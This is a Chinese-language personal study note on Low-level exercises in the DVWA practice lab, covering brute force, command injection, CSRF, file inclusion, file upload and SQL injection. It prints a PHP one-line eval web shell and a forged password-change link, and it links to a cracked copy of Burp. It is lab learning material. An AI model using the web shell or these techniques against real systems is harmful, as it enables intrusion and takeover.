DVWA靶场练习笔记

发现了一个很棒的靶场,里面囊括了Web方向的大多数常见漏洞,并且还分了四个难度等级(Low,Medium,High,Impossible),很适合目前我的需求。

TODO:

  • Low
  • Medium
  • High
  • Impossible
Brute Force(暴力破解)
Low

1698826342694

先随意选择一组用户名和密码看看会发生什么。

1698827316880

显示用户名和/或密码错误,除此之外没有任何的机制。所以考虑使用Burp的Intruder模块对用户名和密码进行爆破。

这里由于username和password都需要爆破。所以考虑Pitchfork模块或者Cluster Bomb模块(Sniper和Batteringram只能导入一个payload),这里选择Clusterbomb。

选择字典之后开始爆破。

1698831896134

发现了一个长度明显有差异的返回长度。输入进去。

1698831967463


Command Injection(指令注入)
Low

1698843230447
(是知识盲区 尝试着分析了一下,工作原理可能是直接将输入框内的文字与ping命令进行拼接。

1698843498673

并且不能过滤不合法的输入,那么尝试一下用&符号进行注入。(windows命令行指令都是啥来着

1698843906106


CSRF(Cross Site Request Forgery)(跨站请求伪造)
Low

1698844012937

尝试抓个包。

1698845752819

发现是直接传递了新的密码和确认的密码,同时查看源代码发现是直接判断New password和Conf password是否相等,并没有其他的验证。

1700221775155

普通版burp不具备生成CSRF poc的功能,换个工具先( burp汉化破解链接 https://www.52pojie.cn/thread-1544866-1-1.html

或者不使用poc工具,直接构造链接 http://127.0.0.1/DVWA-2.3/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# 即可 ,或者再用短链接生成器包装一下看着像那么回事也可以。


File Inclusion(文件包含)
Low

1698849299946

页面上给了三个php文件,逐个点击后没有发现特别有用的信息。

1698849364929

16988493765451698849392702

然后注意到了浏览器的网址栏,发现所谓php文件的读取是直接将php文件传入page中再读出来,联系到标题的文件隐藏,尝试着将page=file3.php改成page=file4.php。

1698849666992


File Upload(文件上传漏洞)
Low

1700222526114

虽然说是上传图片,但是源代码中没有对上传文件的格式作要求

一句话木马干就完了 <?php @eval($_POST['z']);?>

tmd卡巴斯基怎么又给我的文件清理了

1700466093449

上传成功,可以看到下面回显了路径,然后用蚁剑连接或者拼接路径也可以

1700466460394

成功(记得把php文件删掉


Insecure CAPTCHA(不安全验证码)

因配置验证码的key有问题,所以暂时搁置


SQL Injection(SQL注入)
Low

1700468784744

SQL注入的第一步就要判断注入类型。一般来说,SQL注入按照参数分类分为:字符型数字型,按照页面回显分为回显注入盲注回显分为回显正常回显报错盲注分为时间盲注布尔盲注

漏洞挖掘学习笔记 | Eklos's Blog (eklos9z.github.io)

1700541103208